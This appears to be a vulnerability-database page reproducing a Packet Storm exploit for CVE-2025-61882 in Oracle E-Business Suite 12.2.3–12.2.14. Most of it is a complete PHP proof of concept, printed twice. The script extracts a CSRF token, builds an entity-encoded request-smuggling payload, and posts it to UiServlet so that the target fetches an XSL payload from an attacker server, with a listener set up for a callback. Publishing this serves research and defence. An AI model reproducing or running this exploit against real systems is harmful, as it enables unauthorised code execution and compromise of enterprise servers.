📄 Oracle E-Business Suite 12.2.3 Request Smuggling_PACKETSTORM:214643

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

This script is a refined proof of concept targeting Oracle E‑Business Suite EBS vulnerability CVE‑2025‑61882. It corrects logical flaws in request smuggling payload construction, particularly around request termination and CRLF preservation, ensuring...

Visit Original Source

Basic Information

ID PACKETSTORM:214643

Published Jan 30, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Oracle E-Business Suite 12.2.3 through 12.2.14 Corrected Request Smuggling Exploit with Enhanced CSRF Token Extraction |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.oracle.com/applications/ebusiness/ |
=============================================================================================================================================

[+] References: https://packetstorm.news/files/id/214189/ & CVE-2025-61882

[+] Summary: This script is a refined proof-of-concept targeting Oracle E‑Business Suite (EBS) vulnerability CVE‑2025‑61882.
It corrects logical flaws in request smuggling payload construction, particularly around request termination and CRLF preservation, ensuring reliable proxy/backend desynchronization.
The exploit also improves CSRF token extraction by prioritizing response headers (modern EBS behavior) with a fallback to parsing the response body.
Additional fixes harden URL parsing (scheme/host/port handling) to avoid runtime warnings while preserving the original structure.
The result is a more stable, context-aware exploit workflow suitable for controlled security testing and research.

[+] POC : php poc.php

<?php

class OracleEBSCVE202561882Exploit {
private $target;
private $targetPort = 8000;
private $srvHost;
private $srvPort;
private $lhost;
private $lport;
private $verbose = false;
private $cookies = [];
private $userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
private $useHttps = false;

public function __construct($options) {
$this->target = $options['target'] ?? null;
$this->lhost = $options['lhost'] ?? null;
$this->lport = $options['lport'] ?? null;
$this->srvHost = $options['srvHost'] ?? '127.0.0.1';
$this->srvPort = $options['srvPort'] ?? 8080;
$this->verbose = $options['verbose'] ?? false;

if ($this->target) {
$parsed = parse_url($this->target);
if ($parsed !== false) {
$scheme = $parsed['scheme'] ?? 'http';
$this->useHttps = ($scheme === 'https');
$this->target = $parsed['host'] ?? $this->target;
$this->targetPort = $parsed['port'] ?? ($this->useHttps ? 443 : 80);
}
}
}

private function retrieveCsrfTokenImproved() {
$url = $this->buildUrl('/OA_HTML/JavaScriptServlet');
$headers = [
'CSRF-XHR: YES',
'FETCH-CSRF-TOKEN: 1',
'X-Requested-With: XMLHttpRequest'
];

$response = $this->httpRequest('POST', $url, '', $headers, true);

if (preg_match('/X-ORACLE-DBC-CSRF-TOKEN:\s*([a-zA-Z0-9\-]+)/i', $response, $m)) {
return trim($m[1]);
}

if (preg_match('/"csrfToken"\s*:\s*"([^"]+)"/', $response, $m)) {
return $m[1];
}

return false;
}

private function createSmugglePayloadImproved($xslUrl) {
$parsedXsl = parse_url($xslUrl);
$xslHost = $parsedXsl['host'] ?? $this->srvHost;
$xslPath = $parsedXsl['path'] ?? '/payload.xsl';
$smuggled = "GET {$xslPath} HTTP/1.1\r\n";
$smuggled .= "Host: {$xslHost}\r\n";
$smuggled .= "User-Agent: Oracle-Internal/1.0\r\n";
$smuggled .= "Connection: keep-alive\r\n\r\n";
$payload = "0\r\n\r\n";
$payload .= $smuggled;

return $this->encodeSmugglePayload($payload);
}

private function encodeSmugglePayload($payload) {
$encoded = '';
$len = strlen($payload);
for ($i = 0; $i < $len; $i++) {
$c = $payload[$i];
if ($c === "\r" || $c === "\n") {
$encoded .= $c;
} else {
$encoded .= '&#' . ord($c) . ';';
}
}
return $encoded;
}

public function exploit() {
$this->log("Attempting to retrieve CSRF token...", "info");
$token = $this->retrieveCsrfTokenImproved();

if (!$token) {
$this->log("Failed to retrieve CSRF token, smuggling may be unreliable.", "warning");
}

$xslUrl = "http://{$this->srvHost}:{$this->srvPort}/payload.xsl";
$smuggleData = $this->createSmugglePayloadImproved($xslUrl);
$xml = "<?xml version='1.0' encoding='UTF-8'?>";
$xml .= "<initialize>";
$xml .= "<param name='return_url'>http://internal.ebs.local{$smuggleData}</param>";
$xml .= "<param name='ui_type'>Applet</param>";
$xml .= "</initialize>";

$url = $this->buildUrl('/OA_HTML/configurator/UiServlet');
$postData = http_build_query([
'redirectFromJsp' => '1',
'getUiType' => $xml,
'oa_csrf_token' => $token
]);

$this->log("Sending smuggling payload to UiServlet...", "info");
$this->httpRequest('POST', $url, $postData, [
'Content-Type: application/x-www-form-urlencoded'
]);

$this->log("Payload sent. Monitor your HTTP server and listener.", "success");
}

private function httpRequest($method, $url, $data = '', $headers = [], $returnFull = false) {
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_CUSTOMREQUEST => $method,
CURLOPT_HEADER => $returnFull,
CURLOPT_HTTPHEADER => array_merge(
["User-Agent: {$this->userAgent}"],
$headers
)
]);

if ($method === 'POST') {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}

$response = curl_exec($ch);
curl_close($ch);
return $response;
}

private function buildUrl($path) {
$scheme = $this->useHttps ? 'https' : 'http';
return "{$scheme}://{$this->target}:{$this->targetPort}{$path}";
}

private function log($msg, $type) {
echo "[{$type}] {$msg}\n";
}
}

$options = [
'target' => 'http://192.168.1.100:8000',
'lhost' => '192.168.1.50',
'lport' => 4444,
'srvHost' => '192.168.1.50',
'srvPort' => 8080
];

$exploit = new OracleEBSCVE202561882Exploit($options);
$exploit->exploit();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-01-30T17:47:26",
    "description": "This script is a refined proof of concept targeting Oracle E\u2011Business Suite EBS vulnerability CVE\u20112025\u201161882. It corrects logical flaws in request smuggling payload construction, particularly around request termination and CRLF preservation, ensuring...",
    "published": "2026-01-30T00:00:00",
    "modified": "2026-01-30T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Oracle E-Business Suite 12.2.3 Request Smuggling",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:214643",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-61882"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Oracle E-Business Suite 12.2.3 through 12.2.14 Corrected Request Smuggling Exploit with Enhanced CSRF Token Extraction      |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.oracle.com/applications/ebusiness/                                                                              |\n    =============================================================================================================================================\n    \n    [+] References: https://packetstorm.news/files/id/214189/ & CVE-2025-61882\n    \n    [+] Summary: This script is a refined proof-of-concept targeting Oracle E\u2011Business Suite (EBS) vulnerability CVE\u20112025\u201161882. \n                 It corrects logical flaws in request smuggling payload construction, particularly around request termination and CRLF preservation, ensuring reliable proxy/backend desynchronization. \n    \t\t\t The exploit also improves CSRF token extraction by prioritizing response headers (modern EBS behavior) with a fallback to parsing the response body. \n    \t\t\t Additional fixes harden URL parsing (scheme/host/port handling) to avoid runtime warnings while preserving the original structure. \n                 The result is a more stable, context-aware exploit workflow suitable for controlled security testing and research.\n    \n    [+] POC : php poc.php \n    \n    <?php\n    \n    class OracleEBSCVE202561882Exploit {\n        private $target;\n        private $targetPort = 8000;\n        private $srvHost;\n        private $srvPort;\n        private $lhost;\n        private $lport;\n        private $verbose = false;\n        private $cookies = [];\n        private $userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';\n        private $useHttps = false;\n    \n        public function __construct($options) {\n            $this->target   = $options['target'] ?? null;\n            $this->lhost    = $options['lhost'] ?? null;\n            $this->lport    = $options['lport'] ?? null;\n            $this->srvHost  = $options['srvHost'] ?? '127.0.0.1';\n            $this->srvPort  = $options['srvPort'] ?? 8080;\n            $this->verbose  = $options['verbose'] ?? false;\n    \n            if ($this->target) {\n                $parsed = parse_url($this->target);\n                if ($parsed !== false) {\n                    $scheme = $parsed['scheme'] ?? 'http';\n                    $this->useHttps = ($scheme === 'https');\n                    $this->target = $parsed['host'] ?? $this->target;\n                    $this->targetPort = $parsed['port'] ?? ($this->useHttps ? 443 : 80);\n                }\n            }\n        }\n    \n        private function retrieveCsrfTokenImproved() {\n            $url = $this->buildUrl('/OA_HTML/JavaScriptServlet');\n            $headers = [\n                'CSRF-XHR: YES',\n                'FETCH-CSRF-TOKEN: 1',\n                'X-Requested-With: XMLHttpRequest'\n            ];\n    \n            $response = $this->httpRequest('POST', $url, '', $headers, true);\n    \n            if (preg_match('/X-ORACLE-DBC-CSRF-TOKEN:\\s*([a-zA-Z0-9\\-]+)/i', $response, $m)) {\n                return trim($m[1]);\n            }\n    \n            if (preg_match('/\"csrfToken\"\\s*:\\s*\"([^\"]+)\"/', $response, $m)) {\n                return $m[1];\n            }\n    \n            return false;\n        }\n    \n        private function createSmugglePayloadImproved($xslUrl) {\n            $parsedXsl = parse_url($xslUrl);\n            $xslHost = $parsedXsl['host'] ?? $this->srvHost;\n            $xslPath = $parsedXsl['path'] ?? '/payload.xsl';\n            $smuggled  = \"GET {$xslPath} HTTP/1.1\\r\\n\";\n            $smuggled .= \"Host: {$xslHost}\\r\\n\";\n            $smuggled .= \"User-Agent: Oracle-Internal/1.0\\r\\n\";\n            $smuggled .= \"Connection: keep-alive\\r\\n\\r\\n\";\n            $payload  = \"0\\r\\n\\r\\n\";\n            $payload .= $smuggled;\n    \n            return $this->encodeSmugglePayload($payload);\n        }\n    \n        private function encodeSmugglePayload($payload) {\n            $encoded = '';\n            $len = strlen($payload);\n            for ($i = 0; $i < $len; $i++) {\n                $c = $payload[$i];\n                if ($c === \"\\r\" || $c === \"\\n\") {\n                    $encoded .= $c;\n                } else {\n                    $encoded .= '&#' . ord($c) . ';';\n                }\n            }\n            return $encoded;\n        }\n    \n        public function exploit() {\n            $this->log(\"Attempting to retrieve CSRF token...\", \"info\");\n            $token = $this->retrieveCsrfTokenImproved();\n    \n            if (!$token) {\n                $this->log(\"Failed to retrieve CSRF token, smuggling may be unreliable.\", \"warning\");\n            }\n    \n            $xslUrl = \"http://{$this->srvHost}:{$this->srvPort}/payload.xsl\";\n            $smuggleData = $this->createSmugglePayloadImproved($xslUrl);\n            $xml  = \"<?xml version='1.0' encoding='UTF-8'?>\";\n            $xml .= \"<initialize>\";\n            $xml .= \"<param name='return_url'>http://internal.ebs.local{$smuggleData}</param>\";\n            $xml .= \"<param name='ui_type'>Applet</param>\";\n            $xml .= \"</initialize>\";\n    \n            $url = $this->buildUrl('/OA_HTML/configurator/UiServlet');\n            $postData = http_build_query([\n                'redirectFromJsp' => '1',\n                'getUiType'      => $xml,\n                'oa_csrf_token'  => $token\n            ]);\n    \n            $this->log(\"Sending smuggling payload to UiServlet...\", \"info\");\n            $this->httpRequest('POST', $url, $postData, [\n                'Content-Type: application/x-www-form-urlencoded'\n            ]);\n    \n            $this->log(\"Payload sent. Monitor your HTTP server and listener.\", \"success\");\n        }\n    \n        private function httpRequest($method, $url, $data = '', $headers = [], $returnFull = false) {\n            $ch = curl_init($url);\n            curl_setopt_array($ch, [\n                CURLOPT_RETURNTRANSFER => true,\n                CURLOPT_SSL_VERIFYPEER => false,\n                CURLOPT_CUSTOMREQUEST  => $method,\n                CURLOPT_HEADER         => $returnFull,\n                CURLOPT_HTTPHEADER     => array_merge(\n                    [\"User-Agent: {$this->userAgent}\"],\n                    $headers\n                )\n            ]);\n    \n            if ($method === 'POST') {\n                curl_setopt($ch, CURLOPT_POSTFIELDS, $data);\n            }\n    \n            $response = curl_exec($ch);\n            curl_close($ch);\n            return $response;\n        }\n    \n        private function buildUrl($path) {\n            $scheme = $this->useHttps ? 'https' : 'http';\n            return \"{$scheme}://{$this->target}:{$this->targetPort}{$path}\";\n        }\n    \n        private function log($msg, $type) {\n            echo \"[{$type}] {$msg}\\n\";\n        }\n    }\n    \n    $options = [\n        'target'  => 'http://192.168.1.100:8000',\n        'lhost'   => '192.168.1.50',\n        'lport'   => 4444,\n        'srvHost' => '192.168.1.50',\n        'srvPort' => 8080\n    ];\n    \n    $exploit = new OracleEBSCVE202561882Exploit($options);\n    $exploit->exploit();\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/214643",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/214643/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply